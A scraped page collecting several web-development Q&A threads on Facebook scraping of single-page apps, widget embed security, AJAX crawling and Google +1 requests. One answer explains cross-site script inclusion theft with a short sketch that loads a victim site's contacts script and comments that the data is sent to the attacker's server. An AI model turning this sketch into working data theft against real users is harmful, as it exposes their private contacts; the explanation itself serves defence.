Have facebook scrape a different URL than what was shared

Have facebook scrape a different URL than what was shared - javascript

I have a Single Page Application built in ember.js, we have this hosted on AWS S3 and I'm trying to come up with a solution for when someone shares a URL from our site to facebook to have facebook be able to scrape the content on that page properly.
Obviously this won't work at this time because facebook does not support indexing javascript like the google search engine does. So one solution I've seen is to use apache .htaccess to redirect requests from facebook to a server file that can make a barebones html page with the necessary open graph tags like in this post
https://rck.ms/angular-handlebars-open-graph-facebook-share/
However since we're on S3 I can't do an apache .htaccess, and from what I've been able to gather from the sparse docs on how their S3 redirect rules work and what they can do I'm not sure if there is a way to do this with that method.
So my question is does facebook or open graph or even just normal meta tags have away of allowing the user to share a url, have facebook use that but follow a link to a server generated file, and then if someone clicks that link actually have it point the user to the real single page application page instead of the server file facebook will use for the scrape data.

Facebook supports “pointers” to request the meta data from a different URL – but that likely won’t help you here, because the reference to the URL that serves the meta data would again have to be part of the HTML code of your original URL that you want to share.
You might do better the other way around: Let your users share the URL to your server-generated document that contains the correct meta data – and redirect human visitors that follow that link to the real target URL within your application. You can either do that via JS (location.href='…'), or server-side (but in that case you need to implement an exception from that redirect for the FB scraper; it can be recognized by its User Agent, see https://developers.facebook.com/docs/plugins/faqs#scraperinfo)

Related

Angular app spanning subdomains

So I am building an angular app that allows people to create books and share them (digital books mind you) with a subdomain link.
So something like mycoolbook.theappsite.com would be a sharable link.
I (perhaps stupidly) built the routes so that editing books would be at the url "mycoolbook.theappsite.com/settings".
This being an angular page I am having to do hard redirects between those pages and so miss out on much of the SPA-y goodness. Is there a way to keep the app instance running between those pages?
If not I might move all the admin pages back behind the url like "theappsite.com/book/mycoolbook/settings" instead.
Is this at all possible?
I've already done all the hard work of getting sessions and ajax request working across the domains, it's just the state linking that becomes bothersome.

Short answer is no and have the URL change to reflect it. You cannot change book.domain.com -> domain.com because angular manipulates the URL, but only the fragment section of the URL in hash mode and just the path, search string, hash in HTML5 Mode. Not the other parts of the URL. If your application is using HTML5 mode your server must be able to map URLs properly so they return the correct page (ie index.html) as you change the URL. That would mean both DNS locations would have to send back the same page.
Now you can send AJAX requests between the two domains provided you understand how to deal with cross domain issues (JSONP, CORS, etc).

Security in embedded iframe/javascript widget

I'm building a website that is functionally similar to Google Analytics. I'm not doing analytics, but I am trying to provide either a single line of javascript or a single line iframe that will add functionality to other websites.
Specifically, the embedded content will be a button that will popup a new window and allow the user to perform some actions. Eventually the user will finish and the window will close, at which point the button will update to a new element reflecting that the user completed the flow.
The popup window will load content from my site, but my question pertains to the embedded line of javascript (or the iframe). What's the best practice way of doing this? Google analytics and optimizely use javascript to modify the host page. Obviously an iFrame would work too.
The security concern I have is that someone will copy the embed code from one site and put it on another. Each page/site combination that implements my script/iframe is going to have a unique ID that the site's developers will generate from an authenticated account on my site. I then supply them with the appropriate embed code.
My first thought was to just use an iframe that loads a page off my site with url parameters specific to the page/site combo. If I go that route, is there a way to determine that the page is only loaded from an iframe embedded on a particular domain or url prefix? Could something similar be accomplished with javascript?
I read this post which was very helpful, but my use case is a bit different since I'm actually going to pop up content for users to interact with. The concern is that an enemy of the site hosting my embed will deceptively lure their own users to use the widget. These users will believe they are interacting with my site on behalf of the enemy site but actually be interacting on behalf of the friendly site.

If you want to keep it as a simple, client-side only widget, the simple answer is you can't do it exactly like you describe.
The two solutions that come to mind for this are as follows, the first being a compromise but simple and the second being a bit more involved (for both you and users of your widget).
Referer Check
You could validate the referer HTTP header to check that the domain matches the one expected for the particular Site ID, but keep in mind that not all browsers will send this (and most will not if the referring page is HTTPS) and that some browser privacy plugins can be configured to withhold it, in which case your widget would not work or you would need an extra, clunky, step in the user experience.
Website www.foo.com embeds your widget using say an embedded script <script src="//example.com/widget.js?siteId=1234&pageId=456"></script>
Your widget uses server side code to generate the .js file dynamically (e.g. the request for the .js file could follow a rewrite rule on your server to map to a PHP / ASPX).
The server side code checks the referer HTTP header to see if it matches the expected value in your database.
On match the widget runs as normal.
On mismatch, or if the referer is blank/missing, the widget will still run, but there will be an extra step that asks the user to confirm that they have accessed the widget from www.foo.com
In order for the confirmation to be safe from clickjacking, you must open the confirmation step in a popup window.
Server Check
Could be a bit over engineered for your purposes and runs the risk of becoming too complicated for clients who wish to embed your widget - you decide.
Website www.foo.com wants to embed your widget for the current page request it is receiving from a user.
The www.foo.com server makes an API request (passing a secret key) to an API you host, requesting a one time key for Page ID 456.
Your API validates the secret key, generates a secure one time key and passes back a value whilst recording the request in the database.
www.foo.com embeds the script as follows <script src="//example.com/widget.js?siteId=1234&oneTimeKey=231231232132197"></script>
Your widget uses server side code to generate the js file dynamically (e.g. the .js could follow a rewrite rule on your server to map to a PHP / ASPX).
The server side code checks the oneTimeKey and siteId combination to check it is valid, and if so generates the widget code and deletes the database record.
If the user reloads the page the above steps would be repeated and a new one time key would be generated. This would guard against evil.com from page scraping the embed code and parameters.

The response here is very thorough and provides lots of great information and ideas. I solved this problem by validating X-Frame-Options headers on the server-side , though the support for those is incomplete in browsers and possibly spoofable.

How can I make an indexable website that uses Javascript router?

I have been working on a project that uses Backbone.js router and all data is loaded by javascript via restful requests. I know that there is no way to detect whether Javascript is enabled or not in server-side but here is the scenarios that I thought to make this website indexable:
I can append a query string for each link on sitemap.xml and I can put a <script> tag to detect whether Javascript is enabled or not. The server renders this page with indexable data and when a user visits this page I can manually initialize Backbone.js router. However the problem is I need to execute an sql query to render indexable data in server-side and it will cause an extra load if the visitor is not a bot. And when users share an url of the website somewhere, it won't be an indexable page and web crawlers may not identify the content of that url. And an extra string in web crawler's search page may be annoying for users.
I can detect popular web crawlers like Google, Yahoo, Bing, Facebook in server-side from their user-agents but I suspect that there will be some web crawlers that I missed.
Which way seems more convenient or do you have any idea & experience to make indexable this kind of websites?

As elias94xx suggested in his comment, one solid solution to this dilemma is to take advantage of Google's "AJAX crawling". In short Google told the web community "look we're not going to actually render your JS code for you, but if you want to render it server-side for us, we'll do our best to make it easy on you." They do that with two basic concepts: pretty URL => ugly URL translation and HTML snapshots.
1) Google implemented a syntax web developers could use to specify client-side URLs that could still be crawled. This syntax for these "pretty URLs", as Google calls them, is: www.example.com?myquery#!key1=value1&key2=value2.
When you use a URL with that with that format, Google won't try to crawl that exact URL. Instead, it will crawl the "ugly URL" equivalent: www.example.com?myquery&_escaped_fragment_=key1=value1%26key2=value2. Since that URL has a ? instead of a # this will of course result in a call to your server. Your server can then use the "HTML snapshot" technique.
2) The basics of that technique is that you have your web-server run a headless JS runner. When Google requests an "ugly URL" from your server, the server loads up your Backbone router code in the headless runner, and it generates (and then returns to Google) the same HTML that code would have generated had it been run client-side.
A full explanation of pretty=>ugly URLs can be found here:
https://developers.google.com/webmasters/ajax-crawling/docs/specification
A full explanation of HTML snapshots can be found here:
https://developers.google.com/webmasters/ajax-crawling/docs/html-snapshot
Oh, and while everything so far has been based on Google, Bing/Yahoo also adopted this syntax, as indicated by Squidoo here:
http://www.squidoo.com/ajax-crawling

Can the Google +1 Javascript API be used in a way that requests are sent via visitor's PC/IP, and not my web server?

Google +1 API reference: http://code.google.com/apis/+1button/
What I want to do is use the Google+1 API on my website that contains pages with links to other websites. When a visitor clicks the +1 button next to a link they like, I want the request to come from the user's computer, not from my web server.
My concern is that Google may think the +1s are spammy or whatnot if they all come from my web server, so I want them to appear natural, coming from IPs all over the world.
Hoping that someone who REALLY understands HTTP requests and Javascript can help answer this.
Thanks in advance!
EDIT:
Turns out the JSON request that's sent when the +1 button is clicked contains a field called "container" that contains the source page URL, not the URL that's actually being +1'd. Also, when the .js files are GET to a visitor's machine, the "Referrer" is set to be the source page URL (of course).
I'm looking for a way to prevent the Referrer and the "container" field from containing the source page URL.

A google +1 link in a web page already comes from the user's computer. The user is displaying your web page on their computer and when a Google +1 link is clicked, the user's own browser makes the Google +1 request to Google's computers. Your web site provides the code in the web page, but the user's own computer makes the Google +1 request. I don't think you need to worry about this issue as your web server is not making the actual Google +1 request.

This is a good question and this exact sort of exploit was once used to steal contact lists from gmail.
Whenever a browser fetches data from a domain, it send across any cookie data that the site has set. This cookie data can then used to authenticate the user, and fetch any specific user data.
For example, when you load a new stackoverflow.com page, your browser sends your cookie data to stackoverflow.com. Stackoverflow uses that data to determine who you are, and shows the appropriate data for you.
The same is true for anything else that you load from a domain, including CSS and Javascript files.
The security vulnerability that Flickr faced was that any website could embed this javascript file hosted on Flickr's servers. Your Flickr cookie data would then be sent over as part of the request (since the javascript was hosted on flickr.com), and Flickr would generate a javascript document containing the sensitive data. The malicious site would then be able to get access to the data that was loaded.
Here is the exploit that was used to steal google contacts, which may make it more clear than my explanation above:
http://blogs.zdnet.com/Google/?p=434

If I was to put an HTML page on my website like this:
<script src="http://www.flickr.com/contacts.js"></script>
<script> // send the contact data to my server with AJAX </script>
Assuming contacts.js uses the session to know which contacts to send, I would now have a copy of your contacts.
However if the contacts are sent via JSON, I can't request them from my HTML page, because it would be a cross-domain AJAX request, which isn't allowed. I can't request the page from my server either, because I wouldn't have your session ID.

In plain english:
Unauthorised computer code (Javascript) running on people's computers is not allowed to get data from anywhere but the site on which it runs - browsers are obliged to enforce this rule.
There is no corresponding restriction on where code can be sourced from, so if you embed data in code any website the user visits can employ the user's credentials to obtain the user's data.

Develop Reference

JavaScript is the programming language of the Web.